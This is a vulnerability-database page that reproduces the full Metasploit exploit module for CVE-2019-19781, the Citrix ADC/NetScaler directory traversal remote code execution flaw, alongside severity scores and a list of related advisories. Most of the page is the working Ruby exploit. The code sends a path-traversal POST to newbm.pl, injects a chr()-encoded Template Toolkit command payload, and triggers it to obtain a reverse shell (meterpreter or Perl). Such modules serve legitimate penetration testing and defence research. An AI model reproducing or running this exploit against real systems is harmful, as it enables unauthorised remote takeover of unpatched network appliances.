Lucene search
Mikhail Klyuchnikov, Project Zero India, TrustedSec, James Brytan, James Smith, Marisa Mack, Rob Vinson, Sergey Pashevkin, Steven Laura, mekhalleh (RAMELLA Sébastien)MSF:EXPLOIT-FREEBSD-HTTP-CITRIX_DIR_TRAVERSAL_RCE-HistoryApr 16, 2021 - 12:13 a.m.
Citrix ADC (NetScaler) Directory Traversal RCE
2021-04-1600:13:25
Mikhail Klyuchnikov, Project Zero India, TrustedSec, James Brytan, James Smith, Marisa Mack, Rob Vinson, Sergey Pashevkin, Steven Laura, mekhalleh (RAMELLA Sébastien)
www.rapid7.com
224
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%
This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::CheckModule
include Msf::Exploit::FileDropper
include Msf::Module::Deprecated
moved_from 'exploit/linux/http/citrix_dir_traversal_rce'
def initialize(info = {})
super(update_info(info,
'Name' => 'Citrix ADC (NetScaler) Directory Traversal RCE',
'Description' => %q{
This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka
NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.
},
'Author' => [
'Mikhail Klyuchnikov', # Discovery
'Project Zero India', # PoC used by this module
'TrustedSec', # PoC used by this module
'James Brytan', # PoC contributed independently
'James Smith', # PoC contributed independently
'Marisa Mack', # PoC contributed independently
'Rob Vinson', # PoC contributed independently
'Sergey Pashevkin', # PoC contributed independently
'Steven Laura', # PoC contributed independently
'mekhalleh (RAMELLA Sébastien)' # Module author (https://www.pirates.re/)
],
'References' => [
['CVE', '2019-19781'],
['EDB', '47901'],
['EDB', '47902'],
['URL', 'https://support.citrix.com/article/CTX267027/'],
['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],
['URL', 'https://swarm.ptsecurity.com/remote-code-execution-in-citrix-adc/']
],
'DisclosureDate' => '2019-12-17',
'License' => MSF_LICENSE,
'Platform' => ['python', 'unix'],
'Arch' => [ARCH_PYTHON, ARCH_CMD],
'Privileged' => false,
'Targets' => [
['Python',
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Type' => :python,
'DefaultOptions' => {'PAYLOAD' => 'python/meterpreter/reverse_tcp'}
],
['Unix Command',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'CheckModule' => 'auxiliary/scanner/http/citrix_dir_traversal',
'HttpClientTimeout' => 3.5
},
'Notes' => {
'AKA' => ['Shitrix'],
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
))
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
def cmd_unix_generic?
datastore['PAYLOAD'] == 'cmd/unix/generic'
end
def exploit
print_status("Yeeting #{datastore['PAYLOAD']} payload at #{peer}")
vprint_status("Generated payload: #{payload.encoded}")
case target['Type']
when :python
execute_command(%(/var/python/bin/python2 -c "#{payload.encoded}"))
when :unix_cmd
if (res = execute_command(payload.encoded)) && cmd_unix_generic?
print_line(res.get_html_document.text.gsub(/undef error - Attempt to bless.*/m, ''))
end
end
end
def execute_command(cmd, _opts = {})
filename = rand_text_alpha(8..42)
nonce = rand_text_alpha(8..42)
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/vpn/../vpns/portal/scripts/newbm.pl'),
'headers' => {
'NSC_USER' => "../../../netscaler/portal/templates/#{filename}",
'NSC_NONCE' => nonce
},
'vars_post' => {
'url' => rand_text_alpha(8..42),
'title' => "[%template.new({'BLOCK'='print readpipe(#{chr_payload(cmd)})'})%]"
}
)
unless res && res.code == 200
print_error('No response to POST newbm.pl request')
return
end
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "/vpn/../vpns/portal/#{filename}.xml"),
'headers' => {
'NSC_USER' => rand_text_alpha(8..42),
'NSC_NONCE' => nonce
},
'partial' => true
)
unless res && res.code == 200
print_warning("No response to GET #{filename}.xml request")
end
register_files_for_cleanup(
"/netscaler/portal/templates/#{filename}.xml",
"/var/tmp/netscaler/portal/templates/#{filename}.xml.ttc2"
)
res
end
def chr_payload(cmd)
cmd.each_char.map { |c| "chr(#{c.ord})" }.join('.')
end
end
Related
krebs
krebs
Hackers Were Inside Citrix for Five Months
2020-02-19 15:55:04
malwarebytes
malwarebytes
Healthcare security update: death by ransomware, what’s next?
2020-10-08 15:30:00
Atomic research institute breached via VPN vulnerability
2021-06-21 13:53:03
cisa
cisa
Citrix Releases Security Updates for SD-WAN WANOP
2020-01-23 00:00:00
CISA Releases Test for Citrix ADC and Gateway Vulnerability
2020-01-13 00:00:00
Citrix Adds SD-WAN WANOP, Updated Mitigations to CVE-2019-19781 Advisory
2020-01-17 00:00:00
githubexploit
githubexploit
packetstorm
packetstorm
Citrix Application Delivery Controller / Gateway Remote Code Execution
2020-01-11 00:00:00
Citrix Application Delivery Controller / Gateway Remote Code Execution / Traversal
2020-01-11 00:00:00
Citrix ADC / Gateway Path Traversal
2020-01-16 00:00:00
rapid7blog
rapid7blog
attackerkb
attackerkb
CVE-2019-19781
2019-11-05 00:00:00
CVE-2020-12271: Sophos XG Firewall Pre-Auth SQL Injection Vulnerability
2020-04-27 00:00:00
exploitpack
exploitpack
thn
thn
A Patient Dies After Ransomware Attack Paralyzes German Hospital Systems
2020-09-21 10:20:00
Citrix Releases Patches for Critical ADC Vulnerability Under Active Attack
2020-01-20 14:24:00
PoC Exploits Released for Citrix ADC and Gateway RCE Vulnerability
2020-01-11 10:21:00
ics
ics
Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP
2020-05-21 12:00:00
COVID-19 Exploited by Malicious Cyber Actors
2020-04-08 12:00:00
zdt
zdt
nessus
nessus
Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027) (Direct Check)
2020-01-09 00:00:00
FreeBSD : Template::Toolkit -- Directory traversal on write (2bab995f-36d4-11ea-9dad-002590acae31)
2020-01-15 00:00:00
Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027)
2019-12-24 00:00:00
symantec
symantec
Multiple Citrix Products CVE-2019-19781 Remote Code Execution Vulnerability
2019-12-17 00:00:00
prion
prion
Directory traversal
2019-12-27 14:15:00
cve
cve
CVE-2019-19781
2019-12-27 14:15:00
nuclei
nuclei
Citrix ADC and Gateway - Directory Traversal
2020-04-05 22:27:04
checkpoint_advisories
checkpoint_advisories
Citrix Multiple Products Directory Traversal (CVE-2019-19781)
2020-01-09 00:00:00
fireeye
fireeye
canvas
canvas
Immunity Canvas: NETSCALER_TRAVERSAL_RCE
2019-12-27 14:15:00
talosblog
talosblog
Threat Source newsletter (Jan. 30, 2020)
2020-01-30 11:00:12
New Snort rules protect against recently discovered Citrix vulnerability
2020-01-15 11:41:36
Threat Source newsletter (Jan. 16, 2019)
2020-01-23 07:27:43
impervablog
impervablog
Imperva Mitigates Exploits of Citrix Vulnerability – Right Out of the Box
2020-01-19 15:00:50
Australian Cyber Attack Vectors Blocked Out of the Box by Imperva WAF
2020-07-06 15:01:00
threatpost
threatpost
Postmortem on U.S. Census Hack Exposes Cybersecurity Failures
2021-08-19 14:35:49
RSAC 2019: Microsoft Zero-Day Allows Exploits to Sneak Past Sandboxes
2019-03-05 11:00:03
Citrix Accelerates Patch Rollout For Critical RCE Flaw
2020-01-21 17:19:28
cert
cert
qualysblog
qualysblog
Citrix ADC and Gateway Remote Code Execution Vulnerability (CVE-2019-19781)
2020-01-09 00:12:26
Nefilim Ransomware
2021-05-12 15:34:00
Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach
2020-12-10 00:48:29
metasploit
metasploit
Citrix ADC (NetScaler) Directory Traversal Scanner
2020-01-13 22:39:05
ptsecurity
ptsecurity
PT-2020-01: Arbitrary code execution in Citrix ADC
2019-05-12 00:00:00
cisa_kev
cisa_kev
Citrix ADC, Gateway, and SD-WAN WANOP Appliance Code Execution Vulnerability
2021-11-03 00:00:00
freebsd
freebsd
Template::Toolkit -- Directory traversal on write
2019-12-13 00:00:00
citrix
citrix
exploitdb
exploitdb
kitploit
kitploit
securelist
securelist
Incident Response Analyst Report 2019
2020-08-06 10:00:34
mssecure
mssecure
avleonov
avleonov
Security News: Exchange ProxyShell, Zoom RCE, Citrix Canceled PT Acknowledgments, Cisco No Patch Router RCEs
2021-08-31 23:16:51
Joint Advisory AA22-279A and Vulristics
2022-10-21 20:10:13
mmpc
mmpc
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%
Related for MSF:EXPLOIT-FREEBSD-HTTP-CITRIX_DIR_TRAVERSAL_RCE-